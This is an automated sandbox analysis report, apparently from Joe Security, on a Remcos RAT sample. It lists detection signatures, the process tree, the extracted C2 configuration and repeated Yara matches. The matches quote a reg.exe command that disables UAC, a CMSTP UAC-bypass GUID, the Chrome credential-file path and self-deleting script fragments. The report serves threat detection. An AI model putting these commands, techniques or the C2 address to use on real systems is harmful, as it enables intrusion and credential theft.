Edit tour

Windows Analysis Report
2iH7rqx9rQ.exe

Overview

General Information

Sample name:	2iH7rqx9rQ.exe renamed because original name is a hash value
Original sample name:	ed1416c90a49177106cbea5b7551756e06fee46d77fde4879b8735ec56dd54b4.exe
Analysis ID:	1588952
MD5:	73666f4d35944f20b34c150b8d9df538
SHA1:	8548d775b3475704dfe36e30d3bf115d8964330c
SHA256:	ed1416c90a49177106cbea5b7551756e06fee46d77fde4879b8735ec56dd54b4
Tags:	exeRemcosRATuser-adrian__luca
Infos:

Detection

Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)

Detected Remcos RAT

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Remcos

Suricata IDS alerts for network traffic

Yara detected Remcos RAT

Yara detected UAC Bypass using CMSTP

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to register a low level keyboard hook

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal Firefox passwords or cookies

Contains functionalty to change the wallpaper

Creates autostart registry keys with suspicious names

Delayed program exit found

Machine Learning detection for sample

AV process strings found (often used to terminate AV products)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to enumerate running services

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evaded block containing many API calls

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains executable resources (Code or Archives)

Sigma detected: CurrentVersion Autorun Keys Modification

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64

2iH7rqx9rQ.exe (PID: 2268 cmdline: "C:\Users\user\Desktop\2iH7rqx9rQ.exe" MD5: 73666F4D35944F20B34C150B8D9DF538)

WerFault.exe (PID: 7272 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 928 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 7392 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 1080 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 7496 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 1120 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 7552 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 1128 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 7612 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 1140 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 7692 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 1152 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 7752 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 1180 MD5: C31336C1EFC2CCB44B4326EA793040F2)

yavascript.exe (PID: 7828 cmdline: "C:\Users\user\AppData\Roaming\xenor\yavascript.exe" MD5: 73666F4D35944F20B34C150B8D9DF538)

WerFault.exe (PID: 8064 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7828 -s 520 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 7864 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 916 MD5: C31336C1EFC2CCB44B4326EA793040F2)

yavascript.exe (PID: 7796 cmdline: "C:\Users\user\AppData\Roaming\xenor\yavascript.exe" MD5: 73666F4D35944F20B34C150B8D9DF538)

WerFault.exe (PID: 8040 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7796 -s 668 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 8168 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7796 -s 736 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 7256 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7796 -s 676 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 7380 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7796 -s 752 MD5: C31336C1EFC2CCB44B4326EA793040F2)

yavascript.exe (PID: 2980 cmdline: "C:\Users\user\AppData\Roaming\xenor\yavascript.exe" MD5: 73666F4D35944F20B34C150B8D9DF538)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["198.23.227.212:32583:1"], "Assigned name": "Yavakosa", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "yavascript.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-I7G983", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "xenor", "Keylog folder": "remcos"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000018.00000002.1779032032.0000000000A21000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x918:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.1754203056.000000000089C000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0xa30:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000017.00000002.2515260424.0000000000B7B000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1438:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000023.00000002.1789635981.00000000009B1000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x908:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000023.00000002.1789796940.00000000009FD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000018.00000002.1779058445.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000017.00000002.2515411294.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000017.00000002.2513858594.0000000000400000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000017.00000002.2513858594.0000000000400000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000017.00000002.2513858594.0000000000400000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000017.00000002.2513858594.0000000000400000.00000040.00000001.01000000.00000006.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b6f8:$a1: Remcos restarted by watchdog! 0x6bc70:$a3: %02i:%02i:%02i:%03i
00000017.00000002.2513858594.0000000000400000.00000040.00000001.01000000.00000006.sdmp	REMCOS_RAT_variants	unknown	unknown	0x65994:$str_a1: C:\Windows\System32\cmd.exe 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x65a04:$str_b2: Executing file: 0x6683c:$str_b3: GetDirectListeningPort 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66380:$str_b7: \update.vbs 0x65a2c:$str_b9: Downloaded file: 0x65a18:$str_b10: Downloading file: 0x65abc:$str_b12: Failed to upload file: 0x66804:$str_b13: StartForward 0x66824:$str_b14: StopForward 0x662d8:$str_b15: fso.DeleteFile " 0x6626c:$str_b16: On Error Resume Next 0x66308:$str_b17: fso.DeleteFolder " 0x65aac:$str_b18: Uploaded file: 0x65a6c:$str_b19: Unable to delete: 0x662a0:$str_b20: while fso.FileExists(" 0x65f49:$str_c0: [Firefox StoredLogins not found]
00000017.00000002.2513858594.0000000000400000.00000040.00000001.01000000.00000006.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x65880:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x65810:$s1: CoGetObject 0x65824:$s1: CoGetObject 0x65840:$s1: CoGetObject 0x6f470:$s1: CoGetObject 0x657d0:$s2: Elevation:Administrator!new:
00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b95f:$a1: Remcos restarted by watchdog! 0x6bed7:$a3: %02i:%02i:%02i:%03i
00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000018.00000002.1778751357.0000000000400000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000018.00000002.1778751357.0000000000400000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000018.00000002.1778751357.0000000000400000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000018.00000002.1778751357.0000000000400000.00000040.00000001.01000000.00000006.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b6f8:$a1: Remcos restarted by watchdog! 0x6bc70:$a3: %02i:%02i:%02i:%03i
00000018.00000002.1778751357.0000000000400000.00000040.00000001.01000000.00000006.sdmp	REMCOS_RAT_variants	unknown	unknown	0x65994:$str_a1: C:\Windows\System32\cmd.exe 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x65a04:$str_b2: Executing file: 0x6683c:$str_b3: GetDirectListeningPort 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66380:$str_b7: \update.vbs 0x65a2c:$str_b9: Downloaded file: 0x65a18:$str_b10: Downloading file: 0x65abc:$str_b12: Failed to upload file: 0x66804:$str_b13: StartForward 0x66824:$str_b14: StopForward 0x662d8:$str_b15: fso.DeleteFile " 0x6626c:$str_b16: On Error Resume Next 0x66308:$str_b17: fso.DeleteFolder " 0x65aac:$str_b18: Uploaded file: 0x65a6c:$str_b19: Unable to delete: 0x662a0:$str_b20: while fso.FileExists(" 0x65f49:$str_c0: [Firefox StoredLogins not found]
00000018.00000002.1778751357.0000000000400000.00000040.00000001.01000000.00000006.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x65880:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x65810:$s1: CoGetObject 0x65824:$s1: CoGetObject 0x65840:$s1: CoGetObject 0x6f470:$s1: CoGetObject 0x657d0:$s2: Elevation:Administrator!new:
00000023.00000002.1788896834.0000000000400000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000023.00000002.1788896834.0000000000400000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000023.00000002.1788896834.0000000000400000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000023.00000002.1788896834.0000000000400000.00000040.00000001.01000000.00000006.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b6f8:$a1: Remcos restarted by watchdog! 0x6bc70:$a3: %02i:%02i:%02i:%03i
00000023.00000002.1788896834.0000000000400000.00000040.00000001.01000000.00000006.sdmp	REMCOS_RAT_variants	unknown	unknown	0x65994:$str_a1: C:\Windows\System32\cmd.exe 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x65a04:$str_b2: Executing file: 0x6683c:$str_b3: GetDirectListeningPort 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66380:$str_b7: \update.vbs 0x65a2c:$str_b9: Downloaded file: 0x65a18:$str_b10: Downloading file: 0x65abc:$str_b12: Failed to upload file: 0x66804:$str_b13: StartForward 0x66824:$str_b14: StopForward 0x662d8:$str_b15: fso.DeleteFile " 0x6626c:$str_b16: On Error Resume Next 0x66308:$str_b17: fso.DeleteFolder " 0x65aac:$str_b18: Uploaded file: 0x65a6c:$str_b19: Unable to delete: 0x662a0:$str_b20: while fso.FileExists(" 0x65f49:$str_c0: [Firefox StoredLogins not found]
00000023.00000002.1788896834.0000000000400000.00000040.00000001.01000000.00000006.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x65880:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x65810:$s1: CoGetObject 0x65824:$s1: CoGetObject 0x65840:$s1: CoGetObject 0x6f470:$s1: CoGetObject 0x657d0:$s2: Elevation:Administrator!new:
00000000.00000002.1754239939.00000000008E0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000018.00000002.1779145028.0000000002510000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000018.00000002.1779145028.0000000002510000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000018.00000002.1779145028.0000000002510000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000018.00000002.1779145028.0000000002510000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b95f:$a1: Remcos restarted by watchdog! 0x6bed7:$a3: %02i:%02i:%02i:%03i
00000018.00000002.1779145028.0000000002510000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000023.00000003.1528824074.0000000002560000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000023.00000003.1528824074.0000000002560000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000023.00000003.1528824074.0000000002560000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000023.00000003.1528824074.0000000002560000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaf8:$a1: Remcos restarted by watchdog! 0x6b070:$a3: %02i:%02i:%02i:%03i
00000023.00000003.1528824074.0000000002560000.00000004.00001000.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x64d94:$str_a1: C:\Windows\System32\cmd.exe 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64e04:$str_b2: Executing file: 0x65c3c:$str_b3: GetDirectListeningPort 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65780:$str_b7: \update.vbs 0x64e2c:$str_b9: Downloaded file: 0x64e18:$str_b10: Downloading file: 0x64ebc:$str_b12: Failed to upload file: 0x65c04:$str_b13: StartForward 0x65c24:$str_b14: StopForward 0x656d8:$str_b15: fso.DeleteFile " 0x6566c:$str_b16: On Error Resume Next 0x65708:$str_b17: fso.DeleteFolder " 0x64eac:$str_b18: Uploaded file: 0x64e6c:$str_b19: Unable to delete: 0x656a0:$str_b20: while fso.FileExists(" 0x65349:$str_c0: [Firefox StoredLogins not found]
00000023.00000003.1528824074.0000000002560000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x64c80:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x64c10:$s1: CoGetObject 0x64c24:$s1: CoGetObject 0x64c40:$s1: CoGetObject 0x6e870:$s1: CoGetObject 0x64bd0:$s2: Elevation:Administrator!new:
00000017.00000003.1453393185.0000000002500000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000017.00000003.1453393185.0000000002500000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000017.00000003.1453393185.0000000002500000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000017.00000003.1453393185.0000000002500000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaf8:$a1: Remcos restarted by watchdog! 0x6b070:$a3: %02i:%02i:%02i:%03i
00000017.00000003.1453393185.0000000002500000.00000004.00001000.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x64d94:$str_a1: C:\Windows\System32\cmd.exe 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64e04:$str_b2: Executing file: 0x65c3c:$str_b3: GetDirectListeningPort 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65780:$str_b7: \update.vbs 0x64e2c:$str_b9: Downloaded file: 0x64e18:$str_b10: Downloading file: 0x64ebc:$str_b12: Failed to upload file: 0x65c04:$str_b13: StartForward 0x65c24:$str_b14: StopForward 0x656d8:$str_b15: fso.DeleteFile " 0x6566c:$str_b16: On Error Resume Next 0x65708:$str_b17: fso.DeleteFolder " 0x64eac:$str_b18: Uploaded file: 0x64e6c:$str_b19: Unable to delete: 0x656a0:$str_b20: while fso.FileExists(" 0x65349:$str_c0: [Firefox StoredLogins not found]
00000017.00000003.1453393185.0000000002500000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x64c80:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x64c10:$s1: CoGetObject 0x64c24:$s1: CoGetObject 0x64c40:$s1: CoGetObject 0x6e870:$s1: CoGetObject 0x64bd0:$s2: Elevation:Administrator!new:
00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b6f8:$a1: Remcos restarted by watchdog! 0x6bc70:$a3: %02i:%02i:%02i:%03i
00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp	REMCOS_RAT_variants	unknown	unknown	0x65994:$str_a1: C:\Windows\System32\cmd.exe 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x65a04:$str_b2: Executing file: 0x6683c:$str_b3: GetDirectListeningPort 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66380:$str_b7: \update.vbs 0x65a2c:$str_b9: Downloaded file: 0x65a18:$str_b10: Downloading file: 0x65abc:$str_b12: Failed to upload file: 0x66804:$str_b13: StartForward 0x66824:$str_b14: StopForward 0x662d8:$str_b15: fso.DeleteFile " 0x6626c:$str_b16: On Error Resume Next 0x66308:$str_b17: fso.DeleteFolder " 0x65aac:$str_b18: Uploaded file: 0x65a6c:$str_b19: Unable to delete: 0x662a0:$str_b20: while fso.FileExists(" 0x65f49:$str_c0: [Firefox StoredLogins not found]
00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x65880:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x65810:$s1: CoGetObject 0x65824:$s1: CoGetObject 0x65840:$s1: CoGetObject 0x6f470:$s1: CoGetObject 0x657d0:$s2: Elevation:Administrator!new:
00000000.00000003.1299824966.00000000024F0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000000.00000003.1299824966.00000000024F0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000000.00000003.1299824966.00000000024F0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000000.00000003.1299824966.00000000024F0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaf8:$a1: Remcos restarted by watchdog! 0x6b070:$a3: %02i:%02i:%02i:%03i
00000000.00000003.1299824966.00000000024F0000.00000004.00001000.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x64d94:$str_a1: C:\Windows\System32\cmd.exe 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64e04:$str_b2: Executing file: 0x65c3c:$str_b3: GetDirectListeningPort 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65780:$str_b7: \update.vbs 0x64e2c:$str_b9: Downloaded file: 0x64e18:$str_b10: Downloading file: 0x64ebc:$str_b12: Failed to upload file: 0x65c04:$str_b13: StartForward 0x65c24:$str_b14: StopForward 0x656d8:$str_b15: fso.DeleteFile " 0x6566c:$str_b16: On Error Resume Next 0x65708:$str_b17: fso.DeleteFolder " 0x64eac:$str_b18: Uploaded file: 0x64e6c:$str_b19: Unable to delete: 0x656a0:$str_b20: while fso.FileExists(" 0x65349:$str_c0: [Firefox StoredLogins not found]
00000000.00000003.1299824966.00000000024F0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x64c80:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x64c10:$s1: CoGetObject 0x64c24:$s1: CoGetObject 0x64c40:$s1: CoGetObject 0x6e870:$s1: CoGetObject 0x64bd0:$s2: Elevation:Administrator!new:
00000017.00000002.2514858841.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000017.00000002.2514858841.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000017.00000002.2514858841.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000017.00000002.2514858841.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b95f:$a1: Remcos restarted by watchdog! 0x6bed7:$a3: %02i:%02i:%02i:%03i
